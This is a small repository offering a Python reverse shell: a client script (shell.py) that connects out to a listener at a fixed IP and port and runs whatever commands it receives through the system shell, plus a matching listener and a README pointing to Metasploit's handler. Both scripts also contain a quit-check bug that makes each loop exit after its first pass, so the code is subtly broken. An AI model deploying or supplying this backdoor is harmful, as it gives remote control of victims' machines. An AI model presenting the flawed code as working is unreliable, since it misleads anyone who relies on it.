├── LICENSE
├── README.md
├── listener.py
└── shell.py


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2018-2022 Stephen Harris
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # shell
 2 | Reverse Shell written in Python3
 3 | 
 4 | You can take advantage of post exploitation modules in Metasploit by using:
 5 | exploit/multi/handler 
 6 | set PAYLOAD linux/shell_reverse_tcp 
 7 |             windows/shell_reverse_tcp 
 8 |             etc. 
 9 |             
10 | 


--------------------------------------------------------------------------------
/listener.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | 
 3 | from socket import *
 4 | 
 5 | HOST = '' # '' means bind to all interfaces.
 6 | PORT = 4444 #  Port.
 7 | 
 8 | s = socket(AF_INET, SOCK_STREAM) # Create our socket handler.
 9 | s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # Set is so that when we cancel out we can reuse port.
10 | try:
11 |     s.bind((HOST, PORT)) # Bind to interface.
12 |     print("[*] Listening on 0.0.0.0:%s" % str(PORT)) # Print we are accepting connections.
13 |     s.listen(10) # Listen for only 10 unaccepted connections.
14 |     conn, addr = s.accept() # Accept connections.
15 |     print("[+] Connected by", addr) # Print connected by ipaddress.
16 |     data = conn.recv(1024).decode("UTF-8") # Receive initial connection.
17 |     while 1: # Start loop.
18 |         command = input("arm0red> ") # Enter shell command.
19 |         conn.send(bytes(command, "UTF-8")) # Send shell command.
20 |         if command == "quit" or "exit":
21 |             break # If we specify 'quit' or 'exit', then break out of loop and close socket.
22 |         data = conn.recv(1024).decode("UTF-8") # Receive output from command.
23 |         print(data) # Print the output of the command.
24 | except KeyboardInterrupt: 
25 |     print("...listener terminated using [ctrl+c], Shutting down!")
26 |     exit() # Using [ctrl+c] will terminate the listener.
27 |     
28 | conn.close() # Close socket.
29 | 


--------------------------------------------------------------------------------
/shell.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | import os
 4 | import socket
 5 | import subprocess
 6 | 
 7 | HOST = '192.168.1.100' # The ip of the listener.
 8 | PORT = 4444 # The same port as listener.
 9 | 
10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
11 | s.connect((HOST, PORT)) # Connect to listener.
12 | s.send(str.encode("[*] Connection Established!")) # Send connection confirmation.
13 | 
14 | while 1: # Start loop.
15 |     data = s.recv(1024).decode("UTF-8") # Recieve shell command.
16 |     if data == "quit" or "exit": 
17 |         break # If it's quit, then break out and close socket.
18 |     if data[:2] == "cd":
19 |         os.chdir(data[3:]) # If it's cd, change directory.
20 |     # Run shell command.
21 |     if len(data) > 0:
22 |         proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) 
23 |         stdout_value = proc.stdout.read() + proc.stderr.read() # Read output.
24 |         output_str = str(stdout_value, "UTF-8") # Format output.
25 |         currentWD = os.getcwd() + "> " # Get current working directory.
26 |         s.send(str.encode(currentWD + output_str)) # Send output to listener.
27 |     
28 | s.close() # Close socket.
29 | 
30 | 
31 | 


--------------------------------------------------------------------------------